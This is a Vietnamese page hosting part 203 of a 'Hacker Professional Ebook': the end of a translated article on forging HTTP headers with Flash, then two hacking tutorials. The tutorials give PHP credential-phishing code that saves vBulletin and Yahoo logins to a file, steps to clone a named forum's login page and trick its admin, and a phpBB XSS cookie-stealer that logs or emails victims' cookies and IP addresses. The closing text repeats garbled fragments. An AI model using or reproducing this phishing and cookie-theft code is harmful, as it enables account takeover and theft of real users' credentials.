1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 203 pps

6 67 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Nội dung

Hướng dẫn thêm ================ HTTP Request Splitting ([8]) và HTTP Request Smuggling ([10]) trong IE với Flash 7/8 có thể gữi header Content-Length với bất kì giá trị nào. Điều này cho phép thực hiện tấn công HTTP Request Splitting. Cũng như thế, việc chèn header Transfer-Encoding, hay thêm một header Content-Length thứ hai sẽ mơ ra cơ hội cho HTTP Request Smuggling. Cần phải nghiên cứu xa hơn để nắm rõ những cách thực hiện như vậy có đưa đến khả năng khai thác lỗi hay không Các kinh nghiệm đã cho phép Flash 9 giới hạn nhiều hơn những header sẽ dùng trong LoadVars.addRequestHeader(), ngôn ngữ ActionScript 3.0 sẽ mạnh hơn là 2.0. Như thế, phiên bản mới này cung cấp những tính năng đáng giá tại mức HTTP, như là khả năng gửi nhiều loại HTTP, không chĩ GET và POST. Tốt hơn nên tìm hiểu Flash 9 và ActionScript 3.0 để nắm rõ những tiềm năng của chúng, lưu ý về các mẹo trong HTTP request Kết luận -========== Việc xác thực dựa trên các header của HTTP request mà trình duyệt gửi đi không phải là ý hay. Thực tế thì mọi header có thể bị giả nếu client đang phải chạy một Flash movie xấu, và điều này hoàn toàn đúng với trên 80% máy tính để bàn truy cập Internet. Do đó, khả năng tấn công cross-site scripting trên những header như trên, cũng như tấn công bằng các request giả để cross site (cho những site mà tự bảo vệ bằng cách kiểm tra header Referer) là cao hơn so với những gì người ta nhận thấy Bài viết khuyên nên dùng giải pháp đơn phần cho trường hợp về sau, tuy nhiên giải pháp này phụ thuộc rất nhiều vào Flash, và như thế có thể không cung cấp phần bảo vệ chống đỡ những biến thái được sử dụng với các công nghệ khác, hoặc những phát triển khác trong Flash. Vì thế, với giả mạo request cross site, nên xem xét những giải pháp khác mà không dựa vào Referer Tham khảo -========= [1] "Technology Breakdown" (Adobe website) http://www.adobe.com/products/player_census/flashplayer/tech_breakdown.html [2] "Macromedia Flash Player Version Penetration" (Adobe website) http://www.adobe.com/products/player_census/flashplayer/version_penetration.ht ml [3] "Re: 'Exploiting the XmlHttpRequest object in IE' - paper by Amit Klein" by Anonymous, BugTraq posting, September 27th, 2005 http://www.securityfocus.com/archive/1/411823 [4] "Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1" by Thiago Zaninotti, BugTraq posting, May 8th, 2006 http://www.securityfocus.com/archive/1/433280 [5] "Re: Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1" by Amit Klein, BugTraq posting, May 18th, 2006 http://www.securityfocus.com/archive/1/434729 [6] "Client Side Trojans", Zope developers mailing list, May 2000 http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan [7] "Cross Site Request Forgeries" by Peter Watkins, BugTraq posting, June 15th, 2001 http://www.tux.org/~peterw/csrf.txt [8] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more " by Amit Klein, BugTraq posting, September 24th, 2005 http://www.securityfocus.com/archive/1/411585 [9] "Adobe Flash Player 9 Leads a New Generation of Dynamic Media and Rich Internet Applications" (Adobe website), June 28th, 2006 http://www.adobe.com/aboutadobe/pressroom/pressreleases/200606/062806Flash9 .html [10] "HTTP Request Smuggling" by Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 6th, 2005 http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf Người dịch: hakuso - Nhóm dịch thuật HVA Lấy pass admin VBB.Đôi điều cần bàn Tìm hiểu theo bài viết "Video hacking yahoo" Trong bài viết video hacking yahoo,có bạn đã rất tài tình (Mà cũng không biết của thằng nèo nữa ) để lấy được username và password của victim thông qua đoạn code sau : Trích: <? $f=fopen("xxxx.html","a"); fwrite($f,"$login@yahoo.com : $passwd\n=====================\n"); fclose($f); header("location: http://login.yahoo.com/config/login? o=& .intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent="); ?> Trong đó chú ý đến : login :lưu tên đăng nhập passwd:mật khẩu. sau khi đăng nhập victim sẽ được chuyển tới site security login của yahoo để không nghi ngờ về việc đăng nhập của mình đã được lưu lại Trích: location: http://login.yahoo.com/config/login? o=& .intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent= Từ đó sao chúng ta không xài đến cách lấy pass của admin bằng cách này . Cũng tương tự chúng ta đến trang login của victim để save lại nó: Chẳng hạn thế này: http://tuoitreonline.info/forum/newt =newthread&f=2 (chưa đăng nhập) Nhớ thêm các file trong background cho chuẩn vởi site đó.Up toàn bộ lên hostban và thay cai .html của nó thành dạng như .newthread.php2.htm cho giồng 2 bài viết. Trong file .html của cái này nhở thay : http://www.tuoitreonline.info/forum/login.php bằng http://hostban.com/forum/login.php file login.php của bạn sẽ là`: Trích: <? $f=fopen("xxxx.html","a"); fwrite($f,"$vb_login_username : $vb_login_password\n===========\n"); fclose($f); header("location: http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554"); ?> Bạn thấy đó chính "vb_login_username" và "vb_login_password" là code lưu lại pass dùng cho login Vbb(mọi phiên bản ). và "xxxx.html" là file trống dùng để lưu lại username và pass. Chu ý rằng : Trích: http://www.tuoitreonline.info/forum/ 554#post152554 Đó chính là cái site ma` mình đánh lừa cái thằng admin của trang này . Sau khi reg nick gủi cho admin (dạng tin nhắn ) đoạn sau: Trích: http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554Admi n cho hỏi Chẳng hiểu thể nào mà cai Quote này nó đọc cả code. chep cái này tại đây nhé http://ttvnn.info/forum/lua.html Với "http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554" la` cái đã lưu ý ở trên còn "http://hostban.com/forum/newthread.php2.htm" là trang mà bạn lưu site login của nó. Cách dùng [URL= này khả thi hơn cái code "<a href= vò có nhiều site vbb không cho phép html và vBulletin khuyến cáo không nên cho phép html . Thế nhé Vn_inter(vniss) Hướng dẫn lấy cookies của phpBB (new bug XSS) Dạo này HVA đang lên, anh em vnISS có vẻ trầm quá , làm 1 tut chơi Hướng dẫn lấy cookie của PHPBB Yêu cầu : Không đánh cắp bản quyền bài viết Bài viết mang tính tham khảo và bảo mật, tác giả không chịu mọi trách nhiệm về mặt phá hoại của bài viết này 1 trình browser (e.g : FireFox) 1 hosting hỗ trợ PHP Live http headers (chi tiết tại http://livehttpheaders.mozdev.org ) có thể hiểu nôm na là công cụ giúp ta nhanh chóng fake cookies Bước 1 : Sử dụng đoạn code sau PHP Code: <?php $a = $_GET['helpme']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('giupemvoi.txt', 'a'); fwrite($fp, 'Cookie: '.$a.' Dia chi : ' .$ip. ' Thoi gian: ' .$date. ' Referer: '.$referer.' '); fclose($fp); ?> <HTML> <TITLE>Lam sao day anh, giup em </TITLE> <BODY> <img scr="link file ảnh để fake admin tập 2">he</img> </BODY> </HTML> Save nó lại thành file giupemdianh.php creat 1 file giupemvoi.txt chmod về 777 hoặc nếu you muốn send về mail có thể làm như sau : PHP Code: <?php $a = $_GET['helpme']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); mail('dinhcaohack@yahoo.com','XSS in phpBB', $a.' '.$ip.' '.$date.' '.$referer.' ','sit e_victim'); ?> <HTML> <TITLE>Lam sao day anh, giup em </TITLE> . header("location: http://login.yahoo.com/config/login? o=& .intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");. Trích: location: http://login.yahoo.com/config/login? o=& .intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN